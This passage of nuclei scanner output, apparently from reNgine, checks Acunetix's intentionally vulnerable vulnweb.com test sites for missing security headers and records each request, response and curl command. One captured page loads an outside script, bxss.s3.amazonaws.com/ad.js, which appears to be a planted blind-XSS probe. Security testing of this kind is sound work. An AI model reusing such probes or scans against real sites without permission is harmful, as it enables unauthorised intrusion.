cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.532671211Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:49.535514462Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.537293276Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.572998183Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput 